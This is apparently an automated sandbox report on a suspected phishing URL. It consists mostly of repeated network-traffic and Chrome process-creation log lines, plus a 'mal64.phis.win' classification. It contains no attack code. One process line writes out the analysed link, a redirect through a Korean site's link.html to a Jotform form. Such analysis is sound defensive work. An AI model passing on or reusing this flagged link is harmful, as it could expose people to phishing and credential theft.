        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50579
        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50578
        Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
        Source: unknownNetwork traffic detected: HTTP traffic on port 50581 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50571
        Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50570
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50573
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50572
        Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50575
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
        Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50574
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50576
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50589
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
        Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50581
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50584
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
        Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50586
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50585
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50588
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
        Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
        Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
        Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50598
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
        Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50535
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50534
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50537
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50539
        Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50531
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50530
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50532
        Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
        Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50546
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50545
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50548
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50541
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50543
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50556
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50558
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
        Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50550
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
        Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50555
        Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50554
        Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50568
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50567
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50569
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50560
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50562
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
        Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50565
        Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
        Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
        Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
        Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
        Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
        Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
        Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
        Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
        Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
        Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownHTTPS traffic detected: 23.205.93.160:443 -> 192.168.2.16:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.205.93.160:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49947 version: TLS 1.2
        Source: classification engineClassification label: mal64.phis.win@50/474@206/791
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3156 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3156 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
